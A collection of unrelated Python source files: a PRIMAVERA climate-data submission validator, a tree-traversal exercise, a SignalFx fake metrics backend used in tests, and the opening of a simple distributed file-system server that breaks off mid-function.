"""
Create entries in the database for the files in this submission.
:param list validated_metadata: A list containing the metadata dictionary
generated for each file
:param pdata_app.models.DataSubmission data_sub: The data submission object
to update.
:param bool files_online: True if the files are online.
:returns:
"""
for data_file in validated_metadata:
create_database_file_object(data_file, data_sub, files_online,
file_version)
data_sub.status = STATUS_VALUES['VALIDATED']
data_sub.save()
def read_json_file(filename):
"""
Read a JSON file describing the files in this submission.
:param str filename: The name of the JSON file to read.
:returns: a list of dictionaries containing the validated metadata
"""
with open(filename) as fh:
metadata = json.load(fh, object_hook=_dict_to_object)
logger.debug('Metadata for {} files read from JSON file {}'.format(
len(metadata), filename))
return metadata
def write_json_file(validated_metadata, filename):
"""
Write a JSON file describing the files in this submission.
:param list validated_metadata: A list containing the metadata dictionary
generated for each file
:param str filename: The name of the JSON file to write the validated data
to.
"""
with open(filename, 'w') as fh:
json.dump(list(validated_metadata), fh, default=_object_to_default,
indent=4)
logger.debug('Metadata written to JSON file {}'.format(filename))
def create_database_file_object(metadata, data_submission, file_online=True,
file_version=None):
"""
Create a database entry for a data file
:param dict metadata: This file's metadata.
:param pdata_app.models.DataSubmission data_submission: The parent data
submission.
:param bool file_online: True if the file is online.
:param str file_version: The version string to apply to each file. The
string from the incoming directory name or the current date is used
if a string isn't supplied.
:returns:
"""
# get a fresh DB connection after exiting from parallel operation
django.db.connections.close_all()
time_units = Settings.get_solo().standard_time_units
if file_version:
version_string = file_version
else:
# find the version number from the date in the submission directory path
date_string = re.search(r'(?<=/incoming/)(\d{8})',
metadata['directory'])
if date_string:
date_string = date_string.group(0)
version_string = 'v' + date_string
else:
today = datetime.datetime.utcnow()
version_string = today.strftime('v%Y%m%d')
# if the file isn't online (e.g. loaded from JSON) then directory is blank
directory = metadata['directory'] if file_online else None
# create a data file. If the file already exists in the database with
# identical metadata then nothing happens. If the file exists but with
# slightly different metadata then django.db.utils.IntegrityError is
# raised
try:
data_file = DataFile.objects.create(
name=metadata['basename'],
incoming_name=metadata['basename'],
incoming_directory=metadata['directory'],
directory=directory, size=metadata['filesize'],
project=metadata['project'],
institute=metadata['institute'],
climate_model=metadata['climate_model'],
activity_id=metadata['activity_id'],
experiment=metadata['experiment'],
variable_request=metadata['variable'],
data_request=metadata['data_request'],
frequency=metadata['frequency'], rip_code=metadata['rip_code'],
start_time=pdt2num(metadata['start_date'], time_units,
metadata['calendar']) if metadata['start_date']
else None,
end_time=pdt2num(metadata['end_date'], time_units,
metadata['calendar'], start_of_period=False) if
metadata['start_date'] else None,
time_units=time_units, calendar=metadata['calendar'],
version=version_string,
data_submission=data_submission, online=file_online,
grid=metadata.get('grid'),
tape_url = metadata.get('tape_url')
)
except django.db.utils.IntegrityError as exc:
msg = ('Unable to submit file {}: {}'.format(metadata['basename'],
exc.__str__()))
logger.error(msg)
raise SubmissionError(msg)
if metadata['checksum_value']:
checksum = get_or_create(Checksum, data_file=data_file,
checksum_value=metadata['checksum_value'],
checksum_type=metadata['checksum_type'])
def move_rejected_files(submission_dir):
"""
Move the entire submission to a rejected directory two levels up from the
submission directory.
:param str submission_dir:
:returns: The path to the submission after the function has run.
"""
rejected_dir = os.path.normpath(os.path.join(submission_dir, '..',
'..', 'rejected'))
try:
if not os.path.exists(rejected_dir):
os.mkdir(rejected_dir)
shutil.move(submission_dir, rejected_dir)
except (IOError, OSError):
msg = ("Unable to move the directory. Leaving it in it's current "
"location")
logger.error(msg)
return submission_dir
submission_rejected_dir = os.path.join(rejected_dir,
os.path.basename(os.path.abspath(submission_dir)))
msg = 'Data submission moved to {}'.format(submission_rejected_dir)
logger.error(msg)
return submission_rejected_dir
def send_user_rejection_email(data_sub):
"""
Send an email to the submission's creator warning them of validation
failure.
:param pdata_app.models.DataSubmission data_sub:
"""
val_tool_url = ('http://proj.badc.rl.ac.uk/primavera-private/wiki/JASMIN/'
'HowTo#SoftwarepackagesinstalledonthePRIMAVERAworkspace')
contact_user_id = Settings.get_solo().contact_user_id
contact_user = User.objects.get(username=contact_user_id)
contact_string = '{} {} ({})'.format(contact_user.first_name,
contact_user.last_name,
contact_user.email)
msg = (
'Dear {first_name} {surname},\n'
'\n'
'Your data submission in {incoming_dir} has failed validation and '
'has been moved to {rejected_dir}.\n'
'\n'
'Please run the validation tool ({val_tool_url}) to check why this '
'submission failed validation. Once the data is passing validation '
'then please resubmit the corrected data.\n'
'\n'
'Please contact {contact_person} if you '
'have any questions.\n'
'\n'
'Thanks,\n'
'\n'
'{friendly_name}'.format(
first_name=data_sub.user.first_name, surname=data_sub.user.last_name,
incoming_dir=data_sub.incoming_directory,
rejected_dir=data_sub.directory, val_tool_url=val_tool_url,
contact_person=contact_string,
friendly_name=contact_user.first_name
))
_email = EmailQueue.objects.create(
recipient=data_sub.user,
subject='[PRIMAVERA_DMT] Data submission failed validation',
message=msg)
def send_admin_rejection_email(data_sub):
"""
Send the admin user an email warning them that a submission failed due to
a server problem (missing data request, etc).
:param pdata_app.models.DataSubmission data_sub:
"""
admin_user_id = Settings.get_solo().contact_user_id
admin_user = User.objects.get(username=admin_user_id)
msg = (
'Data submission {} from incoming directory {} failed validation due '
'to a SubmissionError being raised. Please run the validation script '
'manually on this submission and correct the error.\n'
'\n'
'Thanks,\n'
'\n'
'{}'.format(data_sub.id, data_sub.incoming_directory,
admin_user.first_name)
)
_email = EmailQueue.objects.create(
recipient=admin_user,
subject=('[PRIMAVERA_DMT] Submission {} failed validation'.
format(data_sub.id)),
message=msg
)
def set_status_rejected(data_sub, rejected_dir):
"""
Set the data submission's status to be rejected and update the path to
point to where the data now lives.
:param pdata_app.models.DataSubmission data_sub: The data submission object.
:param str rejected_dir: The name of the directory that the rejected files
have been moved to.
"""
data_sub.status = STATUS_VALUES['REJECTED']
data_sub.directory = rejected_dir
data_sub.save()
def add_tape_url(metadata, tape_base_url, submission_dir):
"""
Add to each file's metadata its URL in the tape system. The URL is
calculated by finding the file's path relative to the submission directory
and appending this to the base URL.
:param list metadata: a list the dictionary object corresponding to
each file
:param str tape_base_url: the top level url of the data in the tape system
:param str submission_dir: the top-level directory of the submission
"""
for data_file in metadata:
rel_dir = os.path.relpath(data_file['directory'], submission_dir)
data_file['tape_url'] = tape_base_url + '/' + rel_dir
def run_prepare(file_paths, num_processes):
"""
Run PrePARE on each file in the submission. Any failures are reported
as an error with the logging and an exception is raised at the end of
processing if one or more files has failed.
:param list file_paths: The paths of the files in the submission's
directory.
:param int num_processes: The number of processes to use in parallel.
:raises SubmissionError: at the end of checking if one or more files has
failed PrePARE's checks.
"""
logger.debug('Starting PrePARE on {} files'.format(len(file_paths)))
jobs = []
manager = Manager()
params = manager.Queue()
file_failed = manager.Event()
if num_processes != 1:
for i in range(num_processes):
p = Process(target=_run_prepare, args=(params, file_failed))
jobs.append(p)
p.start()
for item in itertools.chain(file_paths, (None,) * num_processes):
params.put(item)
if num_processes == 1:
_run_prepare(params, file_failed)
else:
for j in jobs:
j.join()
if file_failed.is_set():
logger.error('Not all files passed PrePARE')
raise SubmissionError()
logger.debug('All files successfully checked by PrePARE')
def _contents_hdf_check(cube, metadata, max_size=MAX_DATA_INTEGRITY_SIZE):
"""
Check that the entire data of the file can be read into memory without
any errors. Corrupt files typically generate an HDF error. Files larger
than `max_size` are not read and a warning is displayed. Most files are
under this limit, but those over are excessively slow to validate.
:param iris.cube.Cube cube: The cube to check
:param dict metadata: Metadata obtained from the file
:param int max_size: Files larger than this (in bytes) are not checked
:returns: True if file read ok.
:raises FileValidationError: If there was any problem reading the data.
"""
if os.path.getsize(os.path.join(metadata['directory'],
metadata['basename'])) > max_size:
logger.warning('File {} is larger than {} bytes. File contents '
'reading check not run.'.format(metadata['basename'],
max_size))
return True
try:
_data = cube.data
except Exception:
msg = 'Unable to read data from file {}.'.format(metadata['basename'])
raise FileValidationError(msg)
else:
return True
def _run_prepare(params, file_failed):
"""
Check a single file with PrePARE. This function is called in parallel by
multiprocessing.
:param multiprocessing.Manager.Queue params: A queue, with each item being
the full path of a file in the submission to check.
:param multiprocessing.Manager.Event file_failed: If set then one or more
files has failed validation.
"""
while True:
file_path = params.get()
if file_path is None:
return
skip_this_var = False
for skip_var in SKIP_PREPARE_VARS:
if skip_var in file_path:
logger.debug('Skipping running PrePARE on {}'.
format(file_path))
skip_this_var = True
break
if skip_this_var:
continue
prepare_script = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'run_prepare.sh'
)
prep_res = subprocess.run([prepare_script, file_path],
stdout=subprocess.PIPE)
if prep_res.returncode:
logger.error('File {} failed PrePARE\n{}'.
format(file_path, prep_res.stdout.decode('utf-8')))
file_failed.set()
def _get_submission_object(submission_dir):
"""
:param str submission_dir: The path of the submission's top level
directory.
:returns: The object corresponding to the submission.
:rtype: pdata_app.models.DataSubmission
"""
try:
data_sub = DataSubmission.objects.get(incoming_directory=submission_dir)
except django.core.exceptions.MultipleObjectsReturned:
msg = 'Multiple DataSubmissions found for directory: {}'.format(
submission_dir)
logger.error(msg)
raise SubmissionError(msg)
except django.core.exceptions.ObjectDoesNotExist:
msg = ('No DataSubmissions have been found in the database for '
'directory: {}. Please create a submission through the web '
'interface.'.format(submission_dir))
logger.error(msg)
raise SubmissionError(msg)
return data_sub
def _guess_plev_name(metadata):
"""
Guess the name of the plev in the data request dimensions.
:param dict metadata: The file's metadata dictionary.
:returns: The name of the pressure levels from the data request or none
if it can't be guessed.
:rtype: str
"""
rootgrp = Dataset(os.path.join(metadata['directory'],
metadata['basename']))
level_name = None
if 'plev' in rootgrp.dimensions:
level_name = 'plev'
elif 'lev' in rootgrp.dimensions:
level_name = 'lev'
if level_name:
num_plevs = len(rootgrp.dimensions[level_name])
if num_plevs == 4:
plev_val = 'plev4'
elif num_plevs == 7:
plev_val = 'plev7h'
elif num_plevs == 27:
plev_val = 'plev27'
else:
plev_val = None
else:
plev_val = None
rootgrp.close()
return plev_val
def _object_to_default(obj):
"""
Convert known objects to a form that can be serialized by JSON
"""
if isinstance(obj, iris.time.PartialDateTime):
obj_dict = {'__class__': obj.__class__.__name__,
'__module__': obj.__module__}
kwargs = {}
for k, v in re.findall(r'(\w+)=(\d+)', repr(obj)):
kwargs[k] = int(v)
obj_dict['__kwargs__'] = kwargs
return obj_dict
elif isinstance(obj, (ActivityId, ClimateModel, Experiment, Institute,
Project)):
obj_dict = {'__class__': obj.__class__.__name__,
'__module__': obj.__module__}
obj_dict['__kwargs__'] = {'short_name': obj.short_name}
return obj_dict
elif isinstance(obj, VariableRequest):
obj_dict = {'__class__': obj.__class__.__name__,
'__module__': obj.__module__}
obj_dict['__kwargs__'] = {'table_name': obj.table_name,
'cmor_name': obj.cmor_name}
return obj_dict
elif isinstance(obj, DataRequest):
obj_dict = {'__class__': obj.__class__.__name__,
'__module__': obj.__module__}
obj_dict['__kwargs__'] = {
'variable_request__table_name': obj.variable_request.table_name,
'variable_request__cmor_name': obj.variable_request.cmor_name,
'institute__short_name': obj.institute.short_name,
'climate_model__short_name': obj.climate_model.short_name,
'experiment__short_name': obj.experiment.short_name,
'rip_code': obj.rip_code
}
return obj_dict
def _dict_to_object(dict_):
"""
Convert a dictionary to an object
"""
if '__class__' in dict_:
module = __import__(dict_['__module__'], fromlist=[dict_['__class__']])
klass = getattr(module, dict_['__class__'])
if dict_['__class__'] == 'PartialDateTime':
inst = klass(**dict_['__kwargs__'])
elif dict_['__class__'] in ('ActivityId', 'ClimateModel',
'Experiment', 'Institute', 'Project',
'VariableRequest', 'DataRequest'):
inst = match_one(klass, **dict_['__kwargs__'])
else:
msg = ('Cannot load from JSON files class {}'.
format(dict_['__class__']))
raise NotImplementedError(msg)
else:
inst = dict_
return inst
def parse_args():
"""
Parse command-line arguments
"""
parser = argparse.ArgumentParser(description='Validate and create a '
'PRIMAVERA data submission')
parser.add_argument('directory', help="the submission's top-level "
"directory")
parser.add_argument('-j', '--mip_era', help='the mip_era that data is '
'ultimately being submitted to '
'(default: %(default)s)',
default='CMIP6')
parser.add_argument('-f', '--file-format', help='the CMOR version of the '
'input netCDF files being '
'submitted (CMIP5 or CMIP6)'
' (default: %(default)s)',
default='CMIP6')
group = parser.add_mutually_exclusive_group()
group.add_argument('-o', '--output', help='write the new entries to the '
'JSON file specified rather '
'than to the database', type=str)
group.add_argument('-i', '--input', help='read the entries to add to the '
'database from the JSON file '
'specified rather than by '
'validating files', type=str)
parser.add_argument('-t', '--tape-base-url', help='add a tape url to each '
'file with the base being specified on the command line', type=str)
parser.add_argument('-l', '--log-level', help='set logging level to one of '
'debug, info, warn (the default), or error')
parser.add_argument('-p', '--processes', help='the number of parallel processes '
'to use (default: %(default)s)', default=8, type=int)
parser.add_argument('-s', '--version-string', help='an optional version to '
'use on all files. If not specifed the string in the incoming '
'directory name or the current date is used', type=str)
parser.add_argument('-r', '--relaxed', help='create a submission from '
'validated files, ignoring failed files (default behaviour is to only '
'create a submission when all files pass validation)', action='store_true')
parser.add_argument('-v', '--validate_only', help='only validate the input, '
'do not create a data submission', action='store_true')
parser.add_argument('-n', '--no-prepare', help="don't run PrePARE",
action='store_true')
parser.add_argument('-d', '--data-limit', help='the maximum size of file '
'(in bytes) to load into '
'memory for an HDF '
'integrity check (default: '
'%(default)s)',
type=int, default=MAX_DATA_INTEGRITY_SIZE)
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
def main(args):
"""
Main entry point
"""
if args.processes == 1 and not iris.__version__.startswith('1.'):
# if not multiprocessing then limit the number of Dask threads
# this can't seem to be limited when using multiprocessing
dask.config.set(pool=ThreadPool(2))
submission_dir = os.path.normpath(args.directory)
logger.debug('Submission directory: %s', submission_dir)
logger.debug('Project: %s', args.mip_era)
logger.debug('Processes requested: %s', args.processes)
try:
if args.input:
validated_metadata = read_json_file(args.input)
data_sub = _get_submission_object(submission_dir)
files_online = False
else:
files_online = True
data_files = list_files(submission_dir)
logger.debug('%s files identified', len(data_files))
if not args.validate_only and not args.output:
data_sub = _get_submission_object(submission_dir)
if data_sub.status != 'ARRIVED':
msg = "The submission's status is not ARRIVED."
logger.error(msg)
raise SubmissionError(msg)
try:
if not args.no_prepare:
run_prepare(data_files, args.processes)
validated_metadata = list(identify_and_validate(data_files,
args.mip_era, args.processes, args.file_format))
except SubmissionError:
if not args.validate_only and not args.output:
send_admin_rejection_email(data_sub)
raise
logger.debug('%s files validated successfully',
len(validated_metadata))
if args.validate_only:
logger.debug('Data submission not run (-v option specified)')
logger.debug('Processing complete')
sys.exit(0)
if not args.relaxed and len(validated_metadata) != len(data_files):
# if not args.output:
# rejected_dir = move_rejected_files(submission_dir)
# set_status_rejected(data_sub, rejected_dir)
# send_user_rejection_email(data_sub)
msg = ('Not all files passed validation. Please fix these '
'errors and then re-run this script.')
logger.error(msg)
raise SubmissionError(msg)
if args.tape_base_url:
add_tape_url(validated_metadata, args.tape_base_url, submission_dir)
if args.output:
write_json_file(validated_metadata, args.output)
else:
update_database_submission(validated_metadata, data_sub,
files_online, args.version_string)
logger.debug('%s files submitted successfully',
match_one(DataSubmission, incoming_directory=submission_dir).get_data_files().count())
except SubmissionError:
sys.exit(1)
logger.debug('Processing complete')
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
if cmd_args.log_level:
try:
log_level = getattr(logging, cmd_args.log_level.upper())
except AttributeError:
logger.setLevel(logging.WARNING)
logger.error('log-level must be one of: debug, info, warn or error')
sys.exit(1)
else:
log_level = DEFAULT_LOG_LEVEL
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': DEFAULT_LOG_FORMAT,
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
|
4_1_tree_traversal.py | # python3
import sys, threading
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
class TreeOrders:
def __init__(self):
self.n = int(sys.stdin.readline())
self.key = [0 for i in range(self.n)]
self.left = [0 for i in range(self.n)]
self.right = [0 for i in range(self.n)]
for i in range(self.n):
[a, b, c] = map(int, sys.stdin.readline().split())
self.key[i] = a
self.left[i] = b
self.right[i] = c
def in_order(self):
self.result = []
self._in_order(0)
return self.result
def _in_order(self, idx):
if idx == -1:
return
self._in_order(self.left[idx])
self.result.append(self.key[idx])
self._in_order(self.right[idx])
def pre_order(self):
self.result = []
self._pre_order(0)
return self.result
def _pre_order(self, idx):
if idx == -1:
return
self.result.append(self.key[idx])
self._pre_order(self.left[idx])
self._pre_order(self.right[idx])
def post_order(self):
self.result = []
self._post_order(0)
return self.result
def _post_order(self, idx):
if idx == -1:
return
self._post_order(self.left[idx])
self._post_order(self.right[idx])
self.result.append(self.key[idx])
def main():
tree = TreeOrders()
print(" ".join(str(x) for x in tree.in_order()))
print(" ".join(str(x) for x in tree.pre_order()))
print(" ".join(str(x) for x in tree.post_order()))
threading.Thread(target=main).start()
|
fake_backend.py | import asyncio
import gzip
import json
import socket
import sys
import threading
from collections import OrderedDict, defaultdict
from contextlib import contextmanager
from queue import Queue
from google.protobuf import json_format
from sanic import Sanic, response
from signalfx.generated_protocol_buffers import signal_fx_protocol_buffers_pb2 as sf_pbuf
# This module collects metrics from the agent and can echo them back out for
# making assertions on the collected metrics.
from tests.helpers.formatting import get_metric_type
STOP = type("STOP", (), {})
def bind_tcp_socket(host="127.0.0.1", port=0):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
return (sock, sock.getsockname()[1])
# Fake the /v2/datapoint endpoint and just stick all of the metrics in a
# list
# pylint: disable=unused-variable
def _make_fake_ingest(datapoint_queue, events, spans, save_datapoints, save_events, save_spans):
app = Sanic()
@app.middleware("request")
async def compress_request(request):
if "Content-Encoding" in request.headers:
if "gzip" in request.headers["Content-Encoding"]:
request.body = gzip.decompress(request.body)
@app.post("/v2/datapoint")
async def handle_datapoints(request):
is_json = "application/json" in request.headers.get("content-type")
dp_upload = sf_pbuf.DataPointUploadMessage()
if is_json:
json_format.Parse(request.body, dp_upload)
else:
dp_upload.ParseFromString(request.body)
if save_datapoints:
datapoint_queue.put(dp_upload)
return response.json("OK")
@app.post("/v2/event")
async def handle_event(request):
is_json = "application/json" in request.headers.get("content-type")
event_upload = sf_pbuf.EventUploadMessage()
if is_json:
json_format.Parse(request.body, event_upload)
else:
event_upload.ParseFromString(request.body)
if save_events:
events.extend(event_upload.events) # pylint: disable=no-member
return response.json("OK")
@app.post("/v1/trace")
async def handle_trace(request):
if save_spans:
spans.extend(request.json)
return response.json("OK")
return app
# Fake the dimension PUT method to capture dimension property/tag updates.
# pylint: disable=unused-variable
def _make_fake_dimension_api(app, dims):
@app.get("/v2/dimension/<key>/<value>")
async def get_dim(_, key, value):
dim = dims.get(key, {}).get(value)
if not dim:
return response.json({}, status=404)
return response.json(
{"key": key, "value": value, "customProperties": dim.get("customProperties"), "tags": dim.get("tags")}
)
@app.put("/v2/dimension/<key>/<value>")
async def put_dim(request, key, value):
content = request.json
dims[key][value] = content
return response.json({})
@app.patch("/v2/dimension/<key>/<value>/_/sfxagent")
async def patch_dim(request, key, value):
content = request.json
# The API won't accept these on this endpoint so make sure they aren't
# present
assert content.get("key") is None
assert content.get("value") is None
content["key"] = key
content["value"] = value
prop_keys_to_delete = []
props_to_add = content.get("customProperties", {})
for k, v in props_to_add.items():
if v is None:
prop_keys_to_delete.append(k)
for k in prop_keys_to_delete:
del props_to_add[k]
existing = dims[key].get(value)
if not existing:
dims[key][value] = {"customProperties": props_to_add, "tags": content.get("tags", [])}
return response.json({})
existing_props = existing.get("customProperties", {})
existing_props.update(props_to_add)
existing["customProperties"] = existing_props
for k in prop_keys_to_delete:
del existing_props[k]
existing_tags = existing.get("tags", [])
existing_tags.extend(content.get("tags", []))
existing["tags"] = existing_tags
for tag in content.get("tagsToRemove", []):
existing_tags.remove(tag)
return response.json(existing)
return app
def _make_fake_correlation_api(app, dims):
@app.put("/v2/apm/correlate/<key>/<value>/service")
async def put_service(request, key, value):
service = request.body.decode("utf-8")
dim = dims.get(key, {}).get(value)
if not dim:
dims[key] = {value: {}}
dims[key][value] = {"sf_services": [service]}
elif key in ("kubernetes_pod_uid", "container_id"):
dims[key][value]["sf_services"] = [service]
else:
dim_services = dim.get("sf_services")
if not dim_services:
dim_services = [service]
else:
dim_services.append(service)
dims[key][value]["sf_services"] = dim_services
return response.json({})
@app.put("/v2/apm/correlate/<key>/<value>/environment")
async def put_environment(request, key, value):
environment = request.body.decode("utf-8")
dim = dims.get(key, {}).get(value)
if not dim:
dims[key] = {value: {}}
dims[key][value] = {"sf_environments": [environment]}
elif key in ("kubernetes_pod_uid", "container_id"):
dims[key][value]["sf_environments"] = [environment]
else:
dim_environments = dim.get("sf_environments")
if not dim_environments:
dim_environments = [environment]
else:
dim_environments.append(environment)
dims[key][value]["sf_environments"] = dim_environments
return response.json({})
@app.delete("/v2/apm/correlate/<key>/<value>/service/<prop_value>")
async def delete_service(_, key, value, prop_value):
dim = dims.get(key, {}).get(value)
if not dim:
return response.json({})
services = dim.get("sf_services")
if prop_value in services:
services.remove(prop_value)
dim["sf_services"] = services
return response.json({})
@app.delete("/v2/apm/correlate/<key>/<value>/environment/<prop_value>")
async def delete_environment(_, key, value, prop_value):
dim = dims.get(key, {}).get(value)
if not dim:
return response.json({})
environments = dim.get("sf_environments")
if prop_value in environments:
environments.remove(prop_value)
dim["sf_environments"] = environments
return response.json({})
@app.get("/v2/apm/correlate/<key>/<value>")
async def get_correlation(_, key, value):
dim = dims.get(key, {}).get(value)
if not dim:
return response.json({})
props = {}
services = dim["sf_services"]
if services:
props["sf_services"] = services
environments = dim["sf_environments"]
if environments:
props["sf_environments"] = environments
return response.json(props)
return app
# Starts up a new set of backend services that will run on a random port. The
# returned object will have properties on it for datapoints, events, and dims.
# The fake servers will be stopped once the context manager block is exited.
# pylint: disable=too-many-locals,too-many-statements
@contextmanager
def start(ip_addr="127.0.0.1", ingest_port=0, api_port=0, save_datapoints=True, save_events=True, save_spans=True):
# Data structures are thread-safe due to the GIL
_dp_upload_queue = Queue()
_datapoints = []
_datapoints_by_metric = defaultdict(list)
_datapoints_by_dim = defaultdict(list)
_events = []
_spans = []
_dims = defaultdict(defaultdict)
ingest_app = _make_fake_ingest(_dp_upload_queue, _events, _spans, save_datapoints, save_events, save_spans)
api_app = Sanic()
api_app = _make_fake_dimension_api(api_app, _dims)
api_app = _make_fake_correlation_api(api_app, _dims)
[ingest_sock, _ingest_port] = bind_tcp_socket(ip_addr, ingest_port)
[api_sock, _api_port] = bind_tcp_socket(ip_addr, api_port)
ingest_loop = asyncio.new_event_loop()
async def start_ingest_server():
ingest_app.config.REQUEST_TIMEOUT = ingest_app.config.KEEP_ALIVE_TIMEOUT = 1000
ingest_server = ingest_app.create_server(sock=ingest_sock, access_log=False)
ingest_loop.create_task(ingest_server)
ingest_loop.create_task(start_ingest_server())
threading.Thread(target=ingest_loop.run_forever).start()
api_loop = asyncio.new_event_loop()
async def start_api_server():
api_app.config.REQUEST_TIMEOUT = api_app.config.KEEP_ALIVE_TIMEOUT = 1000
api_server = api_app.create_server(sock=api_sock, access_log=False)
api_loop.create_task(api_server)
api_loop.create_task(start_api_server())
threading.Thread(target=api_loop.run_forever).start()
def _add_datapoints():
"""
This is an attempt at making the datapoint endpoint have more throughput for heavy load tests.
"""
while True:
dp_upload = _dp_upload_queue.get()
if dp_upload is STOP:
return
_datapoints.extend(dp_upload.datapoints) # pylint: disable=no-member
for dp in dp_upload.datapoints: # pylint: disable=no-member
_datapoints_by_metric[dp.metric].append(dp)
for dim in dp.dimensions:
_datapoints_by_dim[f"{dim.key}:{dim.value}"].append(dp)
threading.Thread(target=_add_datapoints).start()
class FakeBackend: # pylint: disable=too-few-public-methods
ingest_host = ip_addr
ingest_port = _ingest_port
ingest_url = f"http://{ingest_host}:{ingest_port}"
api_host = ip_addr
api_port = _api_port
api_url = f"http://{api_host}:{api_port}"
datapoints = _datapoints
datapoints_by_metric = _datapoints_by_metric
datapoints_by_dim = _datapoints_by_dim
events = _events
spans = _spans
dims = _dims
def dump_json(self):
out = OrderedDict()
dps = [dp[0] for dp in self.datapoints_by_metric.values()]
metrics = {(dp.metric, dp.metricType) for dp in dps}
out["metrics"] = {metric: {"type": get_metric_type(metric_type)} for metric, metric_type in sorted(metrics)}
out["dimensions"] = sorted(set(self.datapoints_by_dim))
out["common_dimensions"] = []
# Set dimensions that are present on all datapoints.
for dim, dps in self.datapoints_by_dim.items():
if len({dp.metric for dp in dps}) == len(metrics):
out["common_dimensions"].append(dim)
json.dump(out, sys.stdout, indent=2)
def reset_datapoints(self):
self.datapoints.clear()
self.datapoints_by_metric.clear()
self.datapoints_by_dim.clear()
try:
yield FakeBackend()
finally:
ingest_sock.close()
api_sock.close()
api_loop.stop()
ingest_loop.stop()
_dp_upload_queue.put(STOP)
|
fs.py | import os,socket,threading,sys,ast, queue, shutil, xattr, struct
from pathlib import Path
lock = threading.Lock()
Q = queue.Queue()
'''
To do:
3) Deleting Replicated Files
4) Connecting using hostname
5) Smart client and file transfer with data server direct
6) Making directory and file
7) Removing from list
'''
MAX_MSG = 1024
MAX_SERVS = 3
SERVER_PORT = 10000
CLIENT_PORT = 6969
DFSOnline = 0
RootDir = 'root'
#locname = str(socket.getfqdn())
locname = str(socket.gethostbyname(socket.gethostname()))
localfilelist = []
localreplicalist = []
serverlist={}
clientlist=[]
class bcolors:
HEADER = '\033[95m'#PURPLE
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'#YELLOW
FAIL = '\033[91m'#RED
ENDC = '\033[0m'#WHITE
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class serverContents:
def __init__(self):
self.fd = None
self.filelist = None
self.count = 99999
def globalListGenerator(ign_addr):
globalfilelist=[]
for server in serverlist:
if server ==ign_addr:
continue
if(serverlist[server].filelist!=None):
for files in serverlist[server].filelist:
globalfilelist.append(files[0])
return globalfilelist
def generateList():
del localfilelist[:]
del localreplicalist[:]
for root, dirs, files in os.walk(RootDir):
#localfilelist.append(os.path.relpath(root,RootDir))
prefx = os.path.relpath(root,RootDir)
if (prefx != '.'):
prefx = '/'+prefx
else:
prefx = ''
for f in files:
try:
att = (xattr.getxattr(RootDir+prefx+'/'+f,'user.comment')).decode()
except OSError:
att = 0
if(f.count('%')>0):
fname = prefx+f.replace('%','/')
localfilelist.append([fname, str(att)])
localreplicalist.append(fname)
else:
localfilelist.append([prefx+'/'+f, str(att)])
for d in dirs:
localfilelist.append([prefx+'/'+d+'/',str(-1)])
serverlist[locname].filelist = localfilelist
for files in localfilelist:
print(files)
def fileExists(name):
T = globalListGenerator(-1)
if('/' not in name[:1]):
name = '/'+name
for fil in T:
if fil == name:
return True
return False
def fileExistsLoc(name):
if('/' not in name[:1]):
name = '/'+name
for fil in localfilelist:
if fil[0] == name:
return True
return False
def repExistsLoc(name):
if('/' not in name[:1]):
name='/'+name
for file in localreplicalist:
if name == file:
return True
return False
def locFileLocator(name):
if('/' not in name[:1]):
name = '/'+name
for ind, files in enumerate(localfilelist):
if files[0]==name:
return ind
def custFileLocator(serv, name):
if('/' not in name[:1]):
name = '/'+name
for ind, files in enumerate(serverlist[serv].filelist):
if files[0]==name:
return ind
def fileLocator(name, ign_addr):#return address of server with file
if('/' not in name[:1]):
name = '/'+name
globalfilelist=[]
gfl=[]
for server in serverlist:
if server == ign_addr:
continue
if(serverlist[server].filelist!=None):
globalfilelist.append(serverlist[server].filelist)
gfl.append(server)
for x,filelist in enumerate(globalfilelist):
for fil in filelist:
if fil[0] == name:
return gfl[x]
return -1
def broadcast(msg):
for server in serverlist:
if serverlist[server].fd!=None and server != locname:
try:
serverlist[server].fd.sendall(msg)
except:
continue
def costCreationFunc(cost, ign_addr):
if(ign_addr ==0):
serv=locname
for server in (serverlist):
if ign_addr == server:
continue
if serverlist[server].fd!=None:
if len(serverlist[server].filelist) < cost:
cost = len(serverlist[server].filelist)
serv = server
return serv
def syncFiles(serverid):
for files in serverlist[serverid].filelist:
for files2 in localfilelist:
if files[0] == files2[0]:
if int(files[1]) < int(files2[1]):
if(repExistsLoc(files2[0])):
files2[0] =files2[0].replace('/','%')
name = RootDir+'/'+files2[0]
serverlist[serverid].fd.sendall(('fil_up'+files[0]+';'+files2[1]+';'+Path(name).read_text() +'Āā').encode())
serverlist[serverid].filelist[1] = files2[1]
break
def cmdParse(cmd):
#filelist = os.listdir("root")
ret_msg = ''
if cmd == 'peek'or cmd == 'dir':
T = globalListGenerator(-1)
#T.extend(globalReplicGenerator())
T = set(T)
ret_msg = '-'*10 +'File Directory' + '-'*10 +'\n'
ret_msg +=RootDir+'/\n'
filelists = sorted(T)
for ind, files in enumerate(filelists):
lvl = files[:-1].count('/')
name = files[:-1].rfind('/')
prev_lvl =filelists[ind-1][:-1].count('/')
ret_msg += ' '*lvl
if(ind == len(filelists)-1):
ret_msg += '└'+files[name:]+'\n'
continue
else:
nxt_lvl = filelists[ind+1][:-1].count('/')
if(lvl>prev_lvl and nxt_lvl == lvl):
ret_msg += '┌'
elif( lvl == nxt_lvl):
ret_msg += '├'
else:
ret_msg += '└'
ret_msg += files[name:]+'\n'
elif cmd[:5] == 'read ':
path = cmd[5:]
exe_str = cmd[-(len(path)-(path.rfind('.'))):]
extensions = ['.txt','.c','.py']
if not(any(x in exe_str for x in extensions)):
ret_msg ='File not readable'
elif not(fileExists(path)):
ret_msg ='File Does Not Exists'
elif (fileExistsLoc(path)):
if(repExistsLoc(path)):
path =path.replace('/','%')
